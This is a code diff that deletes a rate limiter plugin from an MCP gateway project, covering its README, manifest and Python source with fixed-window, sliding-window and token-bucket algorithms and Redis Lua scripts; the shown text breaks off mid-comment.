(applied on top of by_user) - search: "10/m" - summarise: "5/m" - - # Algorithm — choose one (default: fixed_window) - algorithm: "fixed_window" # fixed_window | sliding_window | token_bucket - - # Backend — choose one - backend: "memory" # default: single-process, resets on restart - # backend: "redis" # shared across all gateway instances - - # Redis options (required when backend: redis) - redis_url: "redis://redis:6379/0" - redis_key_prefix: "rl" - redis_fallback: true # fall back to memory if Redis is unavailable -``` - -### Configuration reference - -| Field | Type | Default | Description | -|---|---|---|---| -| `by_user` | string | `null` | Per-user rate limit, e.g. `"60/m"` | -| `by_tenant` | string | `null` | Per-tenant rate limit, e.g. `"600/m"` | -| `by_tool` | dict | `{}` | Per-tool overrides, e.g. `{"search": "10/m"}` | -| `algorithm` | string | `"fixed_window"` | Counting algorithm: `"fixed_window"`, `"sliding_window"`, or `"token_bucket"` | -| `backend` | string | `"memory"` | `"memory"` or `"redis"` | -| `redis_url` | string | `null` | Redis connection URL (required when `backend: redis`) | -| `redis_key_prefix` | string | `"rl"` | Prefix for all Redis keys | -| `redis_fallback` | bool | `true` | Fall back to memory backend if Redis is unavailable | - -**Rate string format:** `"/"` where unit is `s`/`sec`/`second`, `m`/`min`/`minute`, or `h`/`hr`/`hour`. Malformed strings raise `ValueError` at startup. - -**Omitting a dimension** (e.g. no `by_tenant`) means that dimension is unlimited — no counter is tracked for it. - -## Response headers - -Every request (allowed or blocked) includes: - -| Header | Description | -|---|---| -| `X-RateLimit-Limit` | Configured limit for the most restrictive active dimension | -| `X-RateLimit-Remaining` | Requests remaining in the current window | -| `X-RateLimit-Reset` | Unix timestamp when the current window resets | -| `Retry-After` | Seconds until the window resets (blocked requests only) | - -## Algorithms - -Three counting algorithms are available, selected via the `algorithm` config field. - -| Algorithm | Config value | Best for | Trade-off | -|---|---|---|---| -| Fixed window | `fixed_window` | General use, lowest overhead | Up to 2× the limit at window boundaries | -| Sliding window | `sliding_window` | Smooth enforcement, no boundary burst | Higher memory: stores one timestamp per request per key | -| Token bucket | `token_bucket` | Bursty workloads — allows short spikes up to capacity | Slightly higher Redis overhead: stores `{tokens, last_refill}` hash per key | - -### Fixed window (default) - -Counts requests in a fixed time slot (e.g. "minute 14:03"). Resets at the slot boundary. Simple and fast. The 2× burst at a boundary (N requests at the end of slot T, N requests at the start of T+1) is a known trade-off; use `by_user` with headroom if this matters. - -### Sliding window - -Stores a timestamp for every request in the current window. At each check, expired timestamps are discarded and the remaining count is compared against the limit. Prevents boundary bursts entirely. Memory usage grows with request volume — roughly one float per request per active key. - -### Token bucket - -Each identity (user, tenant, tool) has a bucket that holds up to `count` tokens. Tokens refill at a steady rate of `count/window`. A request consumes one token. Bursts up to the bucket capacity are allowed; sustained rate above `count/window` is rejected. Useful for APIs where short spikes are acceptable but sustained overload is not. - -**Redis support:** `token_bucket` with `backend: redis` is fully supported. The plugin stores `{tokens, last_refill}` in a Redis hash per key and uses an atomic Lua script to refill and consume tokens in a single round-trip — the same pattern as the other two algorithms. This means `token_bucket` enforces a true cluster-wide limit in multi-instance deployments. - -## Backends - -### Memory backend (default, single-instance only) - -- Counters are stored in a process-local dict (`_store`) -- An `asyncio.Lock` serialises all counter reads and writes — safe under concurrent asyncio tasks -- A background sweep task evicts expired windows every 0.5s — for `fixed_window` and `token_bucket`, expired entries are removed promptly; for `sliding_window`, keys with fully stale timestamps are evicted by the sweep -- **Limitation:** state is not shared across processes or hosts. In a multi-instance deployment (e.g. 3 gateway instances behind nginx), each instance tracks its own counter — the effective limit is `N × configured_limit` - -### Redis backend - -- `fixed_window`: atomic Lua `INCR`+`EXPIRE` — one Redis round-trip per check, no race condition -- `sliding_window`: atomic Lua `ZADD`+`ZREMRANGEBYSCORE`+`ZCARD`+`EXPIRE` — one round-trip, no race condition -- `token_bucket`: atomic Lua script — reads `{tokens, last_refill}` hash, refills proportionally, consumes 1 token, writes back — one round-trip, no race condition -- All gateway instances share the same counter — the configured limit is the true cluster-wide limit -- Requires `redis_url` to be set -- If `redis_fallback: true` (default) and Redis is unavailable, the plugin falls back to the in-process `MemoryBackend` automatically — requests are never blocked due to Redis downtime -- If `redis_fallback: false` and Redis is unavailable, the exception is caught and the request is allowed through (fail-open) - -**Multi-instance deployment (important):** The `memory` backend is local to a single gateway instance — rate limit counters are not shared across replicas. For multi-instance deployments (e.g., behind nginx or on OpenShift with multiple gateway pods), always use `backend: redis` to ensure rate limits are enforced correctly across all instances. The default production configuration (`plugins/config.yaml`) already sets `backend: redis`. - -## Examples - -### Single-instance (default config) - -```yaml -config: - by_user: "60/m" - by_tenant: "600/m" -``` - -### Multi-instance with Redis - -```yaml -config: - backend: "redis" - redis_url: "redis://redis:6379/0" - redis_fallback: true - by_user: "30/m" - by_tenant: "3000/m" - by_tool: - search: "10/m" -``` - -### Sliding window (no boundary bursts) - -```yaml -config: - algorithm: "sliding_window" - by_user: "30/m" - by_tenant: "300/m" -``` - -### Token bucket — memory backend (default) - -```yaml -config: - algorithm: "token_bucket" - by_user: "30/m" # bucket holds 30 tokens, refills at 30/min -``` - -### Token bucket — Redis backend (multi-instance) - -```yaml -config: - algorithm: "token_bucket" - backend: "redis" - redis_url: "redis://redis:6379/0" - redis_fallback: true - by_user: "30/m" -``` - -### Permissive mode (observe without blocking) - -```yaml -mode: permissive -config: - by_user: "60/m" -``` - -In `permissive` mode the plugin records violations and emits `X-RateLimit-*` headers but does not block requests. Useful for baselining traffic before switching to `enforce`. - -## Limitations - -| Limitation | Severity | Status | -|---|---|---| -| Memory backend not shared across processes | HIGH | Use Redis backend for multi-instance deployments | -| Fixed window allows up to 2× limit at window boundary | LOW | Use `sliding_window` algorithm, or use `by_user` with headroom | -| `by_tool` matching is case-sensitive | LOW | Fixed — tool names are now normalised with `.strip().lower()` at init | -| Whitespace-only user identity bypasses anonymous bucket | LOW | Documented gap; strip identities before passing to hooks | -| No per-server limits (`server_id` dimension missing) | LOW | Not implemented | -| No config hot-reload — rate string changes require restart | LOW | Not implemented | -| Memory backend not safe under threaded workers (gunicorn `--threads`) | LOW | asyncio.Lock is loop-safe; use async workers (`-k uvicorn`) | diff --git a/plugins/rate_limiter/__init__.py b/plugins/rate_limiter/__init__.py deleted file mode 100644 index 4b118c95be..0000000000 --- a/plugins/rate_limiter/__init__.py +++ /dev/null @@ -1,11 +0,0 @@ -# -*- coding: utf-8 -*- -"""Rate Limiter Plugin. - -Location: ./plugins/rate_limiter/__init__.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 -Authors: Mihai Criveti - -Enforces simple in-memory rate limits by user, tenant, and/or tool. -Uses a fixed window keyed by second for simplicity and determinism. -""" diff --git a/plugins/rate_limiter/plugin-manifest.yaml b/plugins/rate_limiter/plugin-manifest.yaml deleted file mode 100644 index 6a5ac3742c..0000000000 --- a/plugins/rate_limiter/plugin-manifest.yaml +++ /dev/null @@ -1,10 +0,0 @@ -description: "Fixed-window rate limiting by user/tenant/tool — memory (single-process) or Redis (shared across instances)" -author: "Mihai Criveti" -version: "0.1.0" -available_hooks: - - "prompt_pre_fetch" - - "tool_pre_invoke" -default_configs: - by_user: "60/m" - by_tenant: "600/m" - by_tool: {} diff --git a/plugins/rate_limiter/rate_limiter.py b/plugins/rate_limiter/rate_limiter.py deleted file mode 100644 index 42a8e52658..0000000000 --- a/plugins/rate_limiter/rate_limiter.py +++ /dev/null @@ -1,1669 +0,0 @@ -# -*- coding: utf-8 -*- -"""Location: ./plugins/rate_limiter/rate_limiter.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 -Authors: Mihai Criveti - -Rate Limiter Plugin. -Enforces rate limits by user, tenant, and/or tool using a pluggable algorithm: - - fixed_window : simple counter per time bucket (default) - - sliding_window: rolling timestamp log, prevents burst at window boundary - - token_bucket : token refill model, allows short controlled bursts - -All three algorithms support both memory and Redis backends with identical -semantics. The Redis backend uses atomic Lua scripts for each algorithm — -one round-trip per check with no race conditions. - -Security contract — fail-open on error: - Both hook methods (prompt_pre_fetch, tool_pre_invoke) catch all unexpected - exceptions and allow the request through. This is a deliberate design - choice: an internal engine failure (Rust panic, Redis timeout, config bug) - must never block legitimate traffic. The trade-off is that a sustained - engine failure silently disables rate limiting until the error is resolved. - Operators should monitor for rate-limiter error logs and treat them as - high-priority alerts. -""" - -# Future -from __future__ import annotations - -# Standard -import asyncio -from dataclasses import dataclass -import logging -import math -import os -import threading -import time -from typing import Any, Dict, List, Optional, Tuple -import uuid - -# Third-Party -from pydantic import BaseModel, Field - -# First-Party -from mcpgateway.plugins.framework import ( - Plugin, - PluginConfig, - PluginContext, - PluginViolation, - PromptPrehookPayload, - PromptPrehookResult, - ToolPreInvokePayload, - ToolPreInvokeResult, -) - -logger = logging.getLogger(__name__) - -# --------------------------------------------------------------------------- -# Optional Rust engine — Python backend is the fallback when unavailable -# --------------------------------------------------------------------------- - -_RATE_LIMITER_FORCE_PYTHON = os.environ.get("RATE_LIMITER_FORCE_PYTHON", "").strip().lower() in ("1", "true", "yes") -_RateLimiterEngine: Any = None # Assigned below when the Rust extension is available. - -if _RATE_LIMITER_FORCE_PYTHON: - _RUST_AVAILABLE = False -else: - try: - # Third-Party - from rate_limiter_rust.rate_limiter_rust import RateLimiterEngine as _RateLimiterEngine # type: ignore[import] - - _RUST_AVAILABLE = True - except ImportError: - _RUST_AVAILABLE = False - - -class RustRateLimiterEngine: - """Thin Python wrapper around the PyO3 RateLimiterEngine. - - Exposes evaluate_many() / evaluate_many_async() as pure-Python methods so - tests can patch them with unittest.mock (PyO3 C extension methods are - read-only and cannot be patched directly). Pattern mirrors RustPIIDetector - in plugins/pii_filter/pii_filter_rust.py. - """ - - def __init__(self, config: dict) -> None: - """Initialise the Rust engine with the given config dict. - - Args: - config: Engine configuration dict with keys ``by_user``, ``by_tenant``, - ``by_tool``, ``algorithm``, ``backend``, and optionally ``redis_url`` - and ``redis_key_prefix``. - """ - self._engine = _RateLimiterEngine(config) - - def evaluate_many(self, checks: List[Tuple[str, int, int]], now_unix: int) -> Any: - """Delegate to the PyO3 engine (ARCH-01: single call per hook). - - Args: - checks: List of ``(key, limit_count, window_nanos)`` tuples. - now_unix: Current Unix timestamp in whole seconds. - - Returns: - An ``EvalResult`` with the most restrictive outcome across all dimensions. - """ - return self._engine.evaluate_many(checks, now_unix) - - async def evaluate_many_async(self, checks: List[Tuple[str, int, int]], now_unix: int) -> Any: - """Delegate to the PyO3 async engine for Redis-backed calls. - - Args: - checks: List of ``(key, limit_count, window_nanos)`` tuples. - now_unix: Current Unix timestamp in whole seconds. - - Returns: - An ``EvalResult`` with the most restrictive outcome across all dimensions. - """ - return await self._engine.evaluate_many_async(checks, now_unix) - - def check(self, user: str, tenant: Optional[str], tool: str, now_unix: int, include_retry_after: bool) -> Tuple[bool, dict, dict]: - """High-level check: returns (allowed, headers_dict, meta_dict). - - Builds dimension keys internally, evaluates, and returns pre-built - dicts — eliminates per-attribute PyO3 boundary crossings. - - Args: - user: Normalised user identity string. - tenant: Tenant identifier, or ``None`` to skip the tenant dimension. - tool: Lowercased tool or prompt name. - now_unix: Current Unix timestamp in whole seconds. - include_retry_after: Whether to include ``Retry-After`` in headers. - - Returns: - Tuple of ``(allowed, headers_dict, meta_dict)``. - """ - return self._engine.check(user, tenant, tool, now_unix, include_retry_after) - - async def check_async(self, user: str, tenant: Optional[str], tool: str, now_unix: int, include_retry_after: bool) -> Tuple[bool, dict, dict]: - """Async variant of check() for Redis-backed deployments. - - Args: - user: Normalised user identity string. - tenant: Tenant identifier, or ``None`` to skip the tenant dimension. - tool: Lowercased tool or prompt name. - now_unix: Current Unix timestamp in whole seconds. - include_retry_after: Whether to include ``Retry-After`` in headers. - - Returns: - Tuple of ``(allowed, headers_dict, meta_dict)``. - """ - return await self._engine.check_async(user, tenant, tool, now_unix, include_retry_after) - - -# --------------------------------------------------------------------------- -# Constants -# --------------------------------------------------------------------------- - -ALGORITHM_FIXED_WINDOW = "fixed_window" -ALGORITHM_SLIDING_WINDOW = "sliding_window" -ALGORITHM_TOKEN_BUCKET = "token_bucket" # nosec B105 -VALID_ALGORITHMS = (ALGORITHM_FIXED_WINDOW, ALGORITHM_SLIDING_WINDOW, ALGORITHM_TOKEN_BUCKET) - - -# --------------------------------------------------------------------------- -# Helpers -# --------------------------------------------------------------------------- - - -def _parse_rate(rate: str) -> tuple[int, int]: - """Parse rate like '60/m', '10/s', '100/h' -> (count, window_seconds). - - Args: - rate: Rate string in format 'count/unit' (e.g., '60/m', '10/s', '100/h'). - - Returns: - Tuple of (count, window_seconds) for the rate limit. - - Raises: - ValueError: If the rate string is malformed or the unit is not supported. - """ - try: - count_str, per = rate.split("/", maxsplit=1) - count = int(count_str) - except (ValueError, AttributeError): - raise ValueError(f"Invalid rate string {rate!r}: expected '/' e.g. '60/m'") - if count <= 0: - raise ValueError(f"Invalid rate string {rate!r}: count must be > 0, got {count}") - per = per.strip().lower() - if per in ("s", "sec", "second"): - return count, 1 - if per in ("m", "min", "minute"): - return count, 60 - if per in ("h", "hr", "hour"): - return count, 3600 - raise ValueError(f"Invalid rate string {rate!r}: unsupported unit {per!r}, expected s/m/h") - - -def _make_headers(limit: int, remaining: int, reset_timestamp: int, retry_after: int, include_retry_after: bool = True) -> dict[str, str]: - """Create RFC-compliant rate limit headers. - - Args: - limit: The rate limit count. - remaining: Number of requests remaining in the current window. - reset_timestamp: Unix timestamp when the window resets. - retry_after: Seconds until the window resets (for Retry-After header). - include_retry_after: Whether to include Retry-After header (only for violations). - - Returns: - Dictionary of HTTP headers for rate limiting. - """ - headers = { - "X-RateLimit-Limit": str(limit), - "X-RateLimit-Remaining": str(remaining), - "X-RateLimit-Reset": str(reset_timestamp), - } - if include_retry_after: - headers["Retry-After"] = str(retry_after) - return headers - - -def _extract_user_identity(user: Any) -> str: - """Return a stable, normalised string identity from a user context value. - - Handles three cases: - - dict (production JWT context): extract ``email`` → ``id`` → ``sub`` fallback - - string: strip whitespace; empty/whitespace-only falls back to 'anonymous' - - None / falsy: 'anonymous' - - Args: - user: Raw user context value from ``PluginContext.global_context.user``. - - Returns: - Normalised identity string with colons replaced by underscores. - """ - if isinstance(user, dict): - identity = user.get("email") or user.get("id") or user.get("sub") or "" - identity = str(identity).strip() - elif user is None: - identity = "" - else: - identity = str(user).strip() - identity = identity if identity else "anonymous" - # Replace colons to prevent collision with namespace delimiters (user:/tenant:/tool:). - return identity.replace(":", "_") - - -def _select_most_restrictive(results: list[tuple[bool, int, int, dict[str, Any]]]) -> tuple[bool, int, int, int, dict[str, Any]]: - """Select the most restrictive rate limit from multiple dimensions. - - Multi-dimension aggregation contract: - - Any blocked dimension → overall result is blocked. - - Among blocked dimensions: the one with the **lowest** retry_after - (soonest unblock) determines the Retry-After header. This signals - the next state change — the caller learns when at least one dimension - will re-open, even if other dimensions remain blocked longer. An - alternative (max) would guarantee success on retry but delays the - first attempt and hides which dimension unblocked. This is a - deliberate product-level choice shared by both the Python and Rust - implementations. - - Among allowed dimensions: the one with the fewest remaining requests - determines the header values (closest to exhaustion). - - Args: - results: List of (allowed, limit, reset_timestamp, metadata) tuples. - - Returns: - Tuple of (allowed, limit, remaining, reset_timestamp, metadata). - """ - limited_results = [(allowed, limit, reset_ts, meta) for allowed, limit, reset_ts, meta in results if limit > 0] - - if not limited_results: - return True, 0, 0, 0, {"limited": False} - - violated = [(allowed, limit, reset_ts, meta) for allowed, limit, reset_ts, meta in limited_results if not allowed] - allowed_dims = [(allowed, limit, reset_ts, meta) for allowed, limit, reset_ts, meta in limited_results if allowed] - - if violated: - # Pick the violated dimension that will unblock soonest — its reset_in is the - # Retry-After value the client should use to know when to retry. - soonest_reset = min(violated, key=lambda x: x[3].get("reset_in", float("inf"))) - _, limit, reset_ts, meta = soonest_reset - remaining = meta.get("remaining", 0) - retry_after = meta.get("reset_in", 0) - aggregated_meta = { - "limited": True, - "remaining": remaining, - "reset_in": retry_after, - "dimensions": { - "violated": [m for _, _, _, m in violated], - "allowed": [m for _, _, _, m in allowed_dims], - }, - } - return False, limit, remaining, reset_ts, aggregated_meta - - # All dimensions are within limit — surface the tightest one (fewest remaining - # requests) so headers reflect the dimension the caller is closest to exhausting. - tightest = min(allowed_dims, key=lambda x: x[3].get("remaining", float("inf"))) - _, limit, reset_ts, meta = tightest - remaining = meta.get("remaining", 0) - retry_after = meta.get("reset_in", 0) - # "limited" means rate limits are *configured and evaluated*, not that - # the request was blocked. Matches the Rust engine (engine.rs build_meta_dict). - aggregated_meta = { - "limited": True, - "remaining": remaining, - "reset_in": retry_after, - "dimensions": {"allowed": [m for _, _, _, m in allowed_dims]}, - } - return True, limit, remaining, reset_ts, aggregated_meta - - -# --------------------------------------------------------------------------- -# Algorithm strategies — each owns its own store and counting logic -# --------------------------------------------------------------------------- - - -@dataclass -class _Window: - """Fixed window state: when the window started and how many requests so far.""" - - window_start: int - count: int - window_seconds: int = 0 - - -@dataclass -class _Bucket: - """Token bucket state: current token count and when tokens were last refilled.""" - - tokens: float - last_refill: float - window: int = 3600 # window in seconds, used by sweep for eviction threshold - - -class FixedWindowAlgorithm: - """Fixed-window counter. - - Time is divided into fixed slots of `window_seconds`. A counter resets at - each slot boundary. Simple and cheap — O(1) memory per key — but allows - up to 2× the limit when requests straddle a window boundary. - """ - - def __init__(self) -> None: - """Initialise with an empty window store.""" - self._store: Dict[str, _Window] = {} - - async def allow(self, lock: asyncio.Lock, key: str, count: int, window: int) -> Tuple[bool, int, int, Dict[str, Any]]: - """Check and increment the fixed-window counter for *key*. - - Args: - lock: Async lock serialising access to the window store. - key: Rate-limit dimension key (e.g. ``"user:alice"``). - count: Maximum allowed requests per window. - window: Window duration in seconds. - - Returns: - Tuple of ``(allowed, limit, reset_timestamp, metadata)``. - """ - now = int(time.time()) - win_key = f"{key}:{window}" - - async with lock: - wnd = self._store.get(win_key) - - if not wnd or now - wnd.window_start >= window: - reset_timestamp = now + window - self._store[win_key] = _Window(window_start=now, count=1, window_seconds=window) - return True, count, reset_timestamp, {"limited": True, "remaining": count - 1, "reset_in": window} - - reset_timestamp = wnd.window_start + window - reset_in = window - (now - wnd.window_start) - - if wnd.count < count: - wnd.count += 1 - return True, count, reset_timestamp, {"limited": True, "remaining": count - wnd.count, "reset_in": reset_in} - - return False, count, reset_timestamp, {"limited": True, "remaining": 0, "reset_in": reset_in} - - async def sweep(self, lock: asyncio.Lock) -> None: - """Evict all fixed windows whose duration has elapsed. - - Args: - lock: Async lock serialising access to the window store. - """ - now = int(time.time()) - async with lock: - expired = [k for k, w in self._store.items() if now - w.window_start >= w.window_seconds] - for k in expired: - del self._store[k] - - -class SlidingWindowAlgorithm: - """Sliding-window log. - - Stores a list of request timestamps per key. On each request, timestamps - older than `window_seconds` are dropped and the remaining count is checked - against the limit. Prevents burst at window boundaries at the cost of - O(requests-in-window) memory per key. - """ - - def __init__(self) -> None: - """Initialise with an empty timestamp store.""" - self._store: Dict[str, Tuple[List[float], int]] = {} - - async def allow(self, lock: asyncio.Lock, key: str, count: int, window: int) -> Tuple[bool, int, int, Dict[str, Any]]: - """Check the sliding-window log for *key* and record the request if allowed. - - Args: - lock: Async lock serialising access to the timestamp store. - key: Rate-limit dimension key. - count: Maximum allowed requests per window. - window: Window duration in seconds. - - Returns: - Tuple of ``(allowed, limit, reset_timestamp, metadata)``. - """ - now = time.time() - cutoff = now - window - win_key = f"{key}:{window}" - - async with lock: - entry = self._store.get(win_key) - timestamps = entry[0] if entry else [] - # Drop timestamps outside the current window - timestamps = [t for t in timestamps if t > cutoff] - - current = len(timestamps) - reset_timestamp = int(timestamps[0] + window) if timestamps else int(now + window) - reset_in = max(0, int(reset_timestamp - now)) - - if current >= count: - self._store[win_key] = (timestamps, window) - # Ensure Retry-After is at least 1 so clients do not retry immediately - # when the oldest timestamp + window truncates to int(now). - return False, count, reset_timestamp, {"limited": True, "remaining": 0, "reset_in": max(1, reset_in)} - - timestamps.append(now) - self._store[win_key] = (timestamps, window) - remaining = count - len(timestamps) - return True, count, reset_timestamp, {"limited": True, "remaining": remaining, "reset_in": reset_in} - - async def sweep(self, lock: asyncio.Lock) -> None: - """Evict keys whose entire timestamp list is outside the current window. - - Args: - lock: Async lock serialising access to the timestamp store. - """ - now = time.time() - async with lock: - stale = [k for k, (ts, window) in self._store.items() if not ts or all(t <= now - window for t in ts)] - for k in stale: - del self._store[k] - - -class TokenBucketAlgorithm: - """Token bucket. - - Each key starts with `count` tokens. Tokens refill at a steady rate of - `count / window_seconds` per second. Each request consumes one token. - If no token is available the request is blocked. - - Allows short controlled bursts (up to `count` tokens at once) while - enforcing the average rate over time. O(1) memory per key. - """ - - def __init__(self) -> None: - """Initialise with an empty bucket store.""" - self._store: Dict[str, _Bucket] = {} - - async def allow(self, lock: asyncio.Lock, key: str, count: int, window: int) -> Tuple[bool, int, int, Dict[str, Any]]: - """Consume one token from *key*'s bucket, refilling proportionally to elapsed time. - - Args: - lock: Async lock serialising access to the bucket store. - key: Rate-limit dimension key. - count: Bucket capacity (max tokens). - window: Refill period in seconds (tokens refill at ``count / window`` per second). - - Returns: - Tuple of ``(allowed, limit, reset_timestamp, metadata)``. - """ - now = time.time() - refill_rate = count / window # tokens per second - - async with lock: - bucket = self._store.get(key) - - if bucket is None: - # First request — start with a full bucket minus this request. - # Use tokens_needed / refill_rate for time_to_full — consistent - # with the subsequent-request path and the Redis Lua script. - self._store[key] = _Bucket(tokens=count - 1, last_refill=now, window=window) - tokens_needed = 1 # consumed 1 from a full bucket - time_to_full = max(1, int(tokens_needed / refill_rate)) if tokens_needed > 0 else 0 - reset_timestamp = int(now + time_to_full) - return True, count, reset_timestamp, {"limited": True, "remaining": count - 1, "reset_in": time_to_full} - - # Refill tokens based on elapsed time - elapsed = now - bucket.last_refill - bucket.tokens = min(count, bucket.tokens + elapsed * refill_rate) - bucket.last_refill = now - - if bucket.tokens >= 1.0: - bucket.tokens -= 1.0 - remaining = int(bucket.tokens) - # Time until bucket would be full again. - # Use max(1, ...) so sub-second refill times round up to a future - # integer timestamp — mirrors the same guard in the Redis path. - tokens_needed = count - bucket.tokens - time_to_full = max(1, int(tokens_needed / refill_rate)) if tokens_needed > 0 else 0 - reset_timestamp = int(now + time_to_full) - return True, count, reset_timestamp, {"limited": True, "remaining": remaining, "reset_in": time_to_full} - - # No tokens — calculate when next token arrives (ceiling division - # matches the Redis Lua path which uses math.ceil). - time_to_next = max(1, math.ceil((1.0 - bucket.tokens) / refill_rate)) - reset_timestamp = int(now + time_to_next) - return False, count, reset_timestamp, {"limited": True, "remaining": 0, "reset_in": time_to_next} - - async def sweep(self, lock: asyncio.Lock) -> None: - """Evict buckets that are full (no active limiting). - - Args: - lock: Async lock serialising access to the bucket store. - """ - async with lock: - now = time.time() - full = [] - for k, bucket in self._store.items(): - elapsed = now - bucket.last_refill - if elapsed > max(3600, 2 * bucket.window): # inactive beyond window or 1h - full.append(k) - for k in full: - del self._store[k] - - -def _make_algorithm(name: str) -> FixedWindowAlgorithm | SlidingWindowAlgorithm | TokenBucketAlgorithm: - """Instantiate the named algorithm strategy. - - Args: - name: Algorithm name (``fixed_window``, ``sliding_window``, or ``token_bucket``). - - Returns: - Algorithm instance for the requested algorithm. - - Raises: - ValueError: If *name* is not a recognised algorithm. - """ - if name == ALGORITHM_FIXED_WINDOW: - return FixedWindowAlgorithm() - if name == ALGORITHM_SLIDING_WINDOW: - return SlidingWindowAlgorithm() - if name == ALGORITHM_TOKEN_BUCKET: - return TokenBucketAlgorithm() - raise ValueError(f"Unknown algorithm {name!r}: expected one of {VALID_ALGORITHMS}") - - -# --------------------------------------------------------------------------- -# Backends — own the lock, sweep scheduler, and external connection -# --------------------------------------------------------------------------- - - -class MemoryBackend: - """In-process rate limit backend. - - Owns the asyncio.Lock and background sweep scheduler. Delegates all - counting logic to the injected Algorithm strategy. - - Attributes: - _algorithm: The counting strategy (fixed_window, sliding_window, token_bucket). - _lock: asyncio.Lock serialising reads and writes to the algorithm's store. - _sweep_interval: Seconds between background eviction sweeps. - _sweep_task: Running asyncio.Task for the background sweep loop. - """ - - def __init__(self, algorithm: FixedWindowAlgorithm | SlidingWindowAlgorithm | TokenBucketAlgorithm, sweep_interval: float = 0.5) -> None: - """Initialise the backend with the given algorithm and sweep interval. - - Args: - algorithm: Counting strategy instance. - sweep_interval: Seconds between background eviction sweeps. - """ - self._algorithm = algorithm - self._lock: Optional[asyncio.Lock] = None - self._sweep_interval = sweep_interval - self._sweep_task: Optional[asyncio.Task] = None # type: ignore[type-arg] - self._parsed_cache: Dict[str, tuple[int, int]] = {} # rate_str → (count, window) - - def _ensure_lock(self) -> asyncio.Lock: - """Lazily create the asyncio.Lock on first use within a running event loop. - - This avoids binding the lock to the wrong loop on Python 3.11 when the - plugin is instantiated outside an async context. - - Returns: - The shared asyncio.Lock instance for this backend. - """ - if self._lock is None: - self._lock = asyncio.Lock() - return self._lock - - def _ensure_sweep_task(self) -> None: - """Start the background sweep task if it is not already running.""" - if self._sweep_task is None or self._sweep_task.done(): - try: - loop = asyncio.get_running_loop() - self._sweep_task = loop.create_task(self._sweep_loop()) - except RuntimeError: - logger.warning("MemoryBackend: no running event loop; sweep task not started — expired entries will not be evicted") - - async def _sweep_loop(self) -> None: - """Periodically invoke the algorithm's sweep to evict expired entries.""" - while True: - await asyncio.sleep(self._sweep_interval) - await self._algorithm.sweep(self._ensure_lock()) - - async def allow(self, key: str, limit: Optional[str]) -> tuple[bool, int, int, dict[str, Any]]: - """Check the rate limit for *key* against *limit* using the in-process algorithm. - - Args: - key: Rate-limit dimension key (e.g. ``"user:alice"``). - limit: Rate string (e.g. ``"60/m"``), or ``None`` to skip. - - Returns: - Tuple of ``(allowed, limit_count, reset_timestamp, metadata)``. - """ - self._ensure_sweep_task() - if not limit: - return True, 0, 0, {"limited": False} - parsed = self._parsed_cache.get(limit) - if parsed is None: - parsed = _parse_rate(limit) - self._parsed_cache[limit] = parsed - count, window = parsed - return await self._algorithm.allow(self._ensure_lock(), key, count, window) - - -class RedisBackend: - """Shared rate limit backend backed by Redis. - - Supports all three algorithms via atomic Lua scripts — one round-trip per - check with no race conditions. - - .. important:: **Dual Lua-script invariant (rolling-upgrade compatibility)** - - The Rust engine (``plugins_rust/rate_limiter/src/redis_backend.rs``) - contains its own copies of the batch Lua scripts and uses the same - Redis key format (``{prefix}:{dimension_key}:{window_seconds}``). - Both implementations **must** produce identical keys and compatible - counter semantics so that gateway instances running the Rust backend - and instances still on the Python fallback share the same Redis - counters during a rolling upgrade. - - If you change a Lua script or the key format here, you **must** make - the corresponding change in the Rust backend (and vice-versa), and - validate with the ``test_redis_key_format_parity_*`` tests. - - Attributes: - _url: Redis connection URL. - _prefix: Key namespace prefix. - _algorithm_name: Which algorithm to use. - _fallback: Optional MemoryBackend used when Redis is unavailable. - """ - - # Fixed window: atomic INCR + EXPIRE. Returns [count, ttl]. - _LUA_FIXED = """ -local current = redis.call('INCR', KEYS[1]) -if current == 1 then - redis.call('EXPIRE', KEYS[1], ARGV[1]) -end -local ttl = redis.call('TTL', KEYS[1]) -return {current, ttl} -""" - - # Sliding window: remove expired entries, check count, ZADD only if allowed. - # ARGV: [now_float, window_seconds, limit_int, unique_member] - # Returns [allowed_int, current_count, oldest_timestamp_or_0]. - # Fix: check count before ZADD (blocked requests must not inflate the set). - # Fix: use a unique member (ARGV[4]) so simultaneous requests with identical - # timestamps do not collapse into a single sorted-set entry. - _LUA_SLIDING = """ -local now = tonumber(ARGV[1]) -local window = tonumber(ARGV[2]) -local limit = tonumber(ARGV[3]) -local member = ARGV[4] -local cutoff = now - window -redis.call('ZREMRANGEBYSCORE', KEYS[1], '-inf', cutoff) -local count = tonumber(redis.call('ZCARD', KEYS[1])) -redis.call('EXPIRE', KEYS[1], window + 1) -local oldest = redis.call('ZRANGE', KEYS[1], 0, 0, 'WITHSCORES') -local oldest_ts = 0 -if #oldest > 0 then oldest_ts = tonumber(oldest[2]) end -if count >= limit then - return {0, count, oldest_ts} -end -redis.call('ZADD', KEYS[1], now, member) -count = count + 1 -oldest = redis.call('ZRANGE', KEYS[1], 0, 0, 'WITHSCORES') -oldest_ts = 0 -if #oldest > 0 then oldest_ts = tonumber(oldest[2]) end -return {1, count, oldest_ts} -""" - - # Token bucket: HMGET {tokens, last_refill}, refill proportionally, consume 1. - # ARGV: [capacity, refill_rate_per_sec, now_as_float] - # Returns [allowed_int, remaining_floor, time_to_next_token_seconds]. - # NOTE: Lua uses floating-point arithmetic for token refill (tokens + elapsed * rate), - # while the in-memory Rust backend uses integer milli-token math (u128). Under sustained - # high-frequency traffic the two may diverge by ±1 token due to float precision loss. - # This is acceptable for rate limiting — the behavioral contract is identical. - _LUA_TOKEN_BUCKET = """ -local data = redis.call('HMGET', KEYS[1], 'tokens', 'last_refill') -local capacity = tonumber(ARGV[1]) -local rate = tonumber(ARGV[2]) -local now = tonumber(ARGV[3]) - -local tokens = tonumber(data[1]) -local last_refill = tonumber(data[2]) - -if tokens == nil then - tokens = capacity - 1 - redis.call('HSET', KEYS[1], 'tokens', tokens, 'last_refill', now) - local ttl = math.ceil(capacity / rate) + 1 - redis.call('EXPIRE', KEYS[1], ttl) - return {1, math.floor(tokens), 0} -end - -local elapsed = now - last_refill -tokens = math.min(capacity, tokens + elapsed * rate) - -local allowed -local time_to_next = 0 -if tokens >= 1.0 then - tokens = tokens - 1.0 - allowed = 1 -else - allowed = 0 - time_to_next = math.ceil((1.0 - tokens) / rate) -end - -redis.call('HSET', KEYS[1], 'tokens', tokens, 'last_refill', now) -local ttl = math.ceil((capacity - tokens) / rate) + 1 -redis.call('EXPIRE', KEYS[1], ttl) - -return {allowed, math.floor(tokens), time_to_next} -""" - - # LIMITATION: Batch scripts pass multiple KEYS (one per dimension) in a - # 